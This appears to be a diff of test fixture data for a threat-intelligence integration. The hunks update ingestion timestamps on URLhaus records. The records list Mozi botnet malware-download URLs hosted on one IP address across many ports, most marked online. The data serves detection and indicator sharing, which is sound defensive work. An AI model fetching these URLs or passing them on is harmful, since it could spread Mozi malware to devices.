"{\"id\":\"961543\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961543/\",\"url\":\"http://89.160.20.156:44359/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:07:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -333,7 +333,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024464600Z", + "ingested": "2021-12-14T14:56:15.726386301Z", "original": "{\"id\":\"961540\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961540/\",\"url\":\"http://89.160.20.156:56507/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:07:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -382,7 +382,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024471800Z", + "ingested": "2021-12-14T14:56:15.726386657Z", "original": "{\"id\":\"961541\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961541/\",\"url\":\"http://89.160.20.156:57562/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:07:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -431,7 +431,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024479Z", + "ingested": "2021-12-14T14:56:15.726387116Z", "original": "{\"id\":\"961542\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961542/\",\"url\":\"http://89.160.20.156:48845/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:07:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -480,7 +480,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024486700Z", + "ingested": "2021-12-14T14:56:15.726387476Z", "original": "{\"id\":\"961539\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961539/\",\"url\":\"http://89.160.20.156:58245/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:07:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -529,7 +529,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024493900Z", + "ingested": "2021-12-14T14:56:15.726387833Z", "original": "{\"id\":\"961538\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961538/\",\"url\":\"http://89.160.20.156:37198/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:06:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -578,7 +578,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024501300Z", + "ingested": "2021-12-14T14:56:15.726388335Z", "original": "{\"id\":\"961537\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961537/\",\"url\":\"http://89.160.20.156:33524/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:06:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -627,7 +627,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024508500Z", + "ingested": "2021-12-14T14:56:15.726388859Z", "original": "{\"id\":\"961531\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961531/\",\"url\":\"http://89.160.20.156:48261/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -676,7 +676,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024516100Z", + "ingested": "2021-12-14T14:56:15.726389271Z", "original": "{\"id\":\"961532\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961532/\",\"url\":\"http://89.160.20.156:34478/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -725,7 +725,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024523500Z", + "ingested": "2021-12-14T14:56:15.726389631Z", "original": "{\"id\":\"961533\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961533/\",\"url\":\"http://89.160.20.156:35703/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -774,7 +774,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024548900Z", + "ingested": "2021-12-14T14:56:15.726389997Z", "original": "{\"id\":\"961534\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961534/\",\"url\":\"http://89.160.20.156:48666/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -823,7 +823,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024556600Z", + "ingested": "2021-12-14T14:56:15.726390451Z", "original": "{\"id\":\"961535\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961535/\",\"url\":\"http://89.160.20.156:53923/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -872,7 +872,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024563700Z", + "ingested": "2021-12-14T14:56:15.726390864Z", "original": "{\"id\":\"961536\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961536/\",\"url\":\"http://89.160.20.156:52794/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -921,7 +921,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024570900Z", + "ingested": "2021-12-14T14:56:15.726391230Z", "original": "{\"id\":\"961530\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961530/\",\"url\":\"http://89.160.20.156:49312/Mozi.a\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:05:34 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"false\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -970,7 +970,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024577900Z", + "ingested": "2021-12-14T14:56:15.726391589Z", "original": "{\"id\":\"961525\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961525/\",\"url\":\"http://89.160.20.156:38961/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:05:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -1019,7 +1019,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024585Z", + "ingested": "2021-12-14T14:56:15.726391985Z", "original": "{\"id\":\"961526\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961526/\",\"url\":\"http://89.160.20.156:50420/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:05:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -1068,7 +1068,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024592100Z", + "ingested": "2021-12-14T14:56:15.726392472Z", "original": "{\"id\":\"961527\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961527/\",\"url\":\"http://89.160.20.156:55007/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:05:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -1117,7 +1117,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024599400Z", + "ingested": "2021-12-14T14:56:15.726392899Z", "original": "{\"id\":\"961528\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961528/\",\"url\":\"http://89.160.20.156:51143/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:05:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -1166,7 +1166,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024606700Z", + "ingested": "2021-12-14T14:56:15.726393371Z", "original": "{\"id\":\"961529\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961529/\",\"url\":\"http://89.160.20.156:41003/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:05:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -1214,7 +1214,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024613900Z", + "ingested": "2021-12-14T14:56:15.726393724Z", "original": "{\"id\":\"961524\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961524/\",\"url\":\"http://89.160.20.156:35739/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:04:38 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"false\",\"tags\":[\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -1262,7 +1262,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024621Z", + "ingested": "2021-12-14T14:56:15.726395275Z", "original": "{\"id\":\"961523\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961523/\",\"url\":\"http://89.160.20.156:45653/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:04:36 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"false\",\"tags\":[\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -1310,7 +1310,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024628Z", + "ingested": "2021-12-14T14:56:15.726395811Z", "original": "{\"id\":\"961520\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961520/\",\"url\":\"http://89.160.20.156:41349/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:04:33 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"false\",\"tags\":[\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -1358,7 +1358,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024635100Z", + "ingested": "2021-12-14T14:56:15.726396164Z", "original": "{\"id\":\"961521\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961521/\",\"url\":\"http://89.160.20.156:48586/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:04:33 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"false\",\"tags\":[\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -1406,7 +1406,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024642300Z", + "ingested": "2021-12-14T14:56:15.726396513Z", "original": "{\"id\":\"961522\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961522/\",\"url\":\"http://89.160.20.156:38111/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:04:33 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"false\",\"tags\":[\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -1454,7 +1454,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024649400Z", + "ingested": "2021-12-14T14:56:15.726396869Z", "original": "{\"id\":\"961518\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961518/\",\"url\":\"http://89.160.20.156:34556/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:04:10 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"true\",\"tags\":[\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -1503,7 +1503,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024656400Z", + "ingested": "2021-12-14T14:56:15.726397294Z", "original": "{\"id\":\"961519\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961519/\",\"url\":\"http://89.160.20.156:59815/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:04:10 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -1553,7 +1553,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024663400Z", + "ingested": "2021-12-14T14:56:15.726397703Z", "original": "{\"id\":\"961516\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961516/\",\"url\":\"http://89.160.20.156:50587/bin.sh\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:04:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", "category": "threat", "type": "indicator", @@ -1602,7 +1602,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024670600Z", + "ingested": "2021-12-14T14:56:15.726398088Z", "original": "{\"id\":\"961517\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961517/\",\"url\":\"http://89.160.20.156:48322/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:04:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -1650,7 +1650,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024677800Z", + "ingested": "2021-12-14T14:56:15.726398465Z", "original": "{\"id\":\"961515\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961515/\",\"url\":\"http://89.160.20.156:33317/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:04:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"true\",\"tags\":[\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -1698,7 +1698,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024685200Z", + "ingested": "2021-12-14T14:56:15.726398942Z", "original": "{\"id\":\"961513\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961513/\",\"url\":\"http://89.160.20.156:41516/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:04:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"true\",\"tags\":[\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -1746,7 +1746,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024692200Z", + "ingested": "2021-12-14T14:56:15.726399428Z", "original": "{\"id\":\"961514\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961514/\",\"url\":\"http://89.160.20.156:57798/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:04:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"true\",\"tags\":[\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -1794,7 +1794,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024699500Z", + "ingested": "2021-12-14T14:56:15.726399786Z", "original": "{\"id\":\"961509\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961509/\",\"url\":\"http://89.160.20.156:47671/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:04:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"true\",\"tags\":[\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -1842,7 +1842,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024734400Z", + "ingested": "2021-12-14T14:56:15.726400145Z", "original": "{\"id\":\"961510\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961510/\",\"url\":\"http://89.160.20.156:57690/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:04:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"true\",\"tags\":[\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -1891,7 +1891,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024741400Z", + "ingested": "2021-12-14T14:56:15.726400507Z", "original": "{\"id\":\"961511\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961511/\",\"url\":\"http://89.160.20.156:50611/i\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:04:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", "category": "threat", "type": "indicator", 
@@ -1939,7 +1939,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024748300Z", + "ingested": "2021-12-14T14:56:15.726400975Z", "original": "{\"id\":\"961512\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961512/\",\"url\":\"http://89.160.20.156:34141/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:04:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"true\",\"tags\":[\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -1988,7 +1988,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024755300Z", + "ingested": "2021-12-14T14:56:15.726401379Z", "original": "{\"id\":\"961507\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961507/\",\"url\":\"http://89.160.20.156:44399/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:52:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -2037,7 +2037,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024762100Z", + "ingested": "2021-12-14T14:56:15.726401730Z", "original": "{\"id\":\"961508\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961508/\",\"url\":\"http://89.160.20.156:49120/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:52:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -2086,7 +2086,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024769100Z", + "ingested": "2021-12-14T14:56:15.726402093Z", "original": "{\"id\":\"961506\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961506/\",\"url\":\"http://89.160.20.156:51136/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:52:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -2135,7 +2135,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024775800Z", + "ingested": "2021-12-14T14:56:15.726402451Z", "original": "{\"id\":\"961504\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961504/\",\"url\":\"http://89.160.20.156:45773/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:52:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -2184,7 +2184,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024782700Z", + "ingested": "2021-12-14T14:56:15.726402875Z", "original": "{\"id\":\"961505\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961505/\",\"url\":\"http://89.160.20.156:56528/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:52:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -2233,7 +2233,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024791400Z", + "ingested": "2021-12-14T14:56:15.726403224Z", "original": "{\"id\":\"961500\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961500/\",\"url\":\"http://89.160.20.156:44427/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:52:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -2282,7 +2282,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024798600Z", + "ingested": "2021-12-14T14:56:15.726403586Z", "original": "{\"id\":\"961501\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961501/\",\"url\":\"http://89.160.20.156:36134/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:52:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -2331,7 +2331,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024805700Z", + "ingested": "2021-12-14T14:56:15.726403946Z", "original": "{\"id\":\"961502\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961502/\",\"url\":\"http://89.160.20.156:43973/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:52:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -2380,7 +2380,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024812800Z", + "ingested": "2021-12-14T14:56:15.726404368Z", "original": "{\"id\":\"961503\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961503/\",\"url\":\"http://89.160.20.156:41319/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:52:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -2429,7 +2429,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024819800Z", + "ingested": "2021-12-14T14:56:15.726404801Z", "original": "{\"id\":\"961496\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961496/\",\"url\":\"http://89.160.20.156:51847/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:52:04 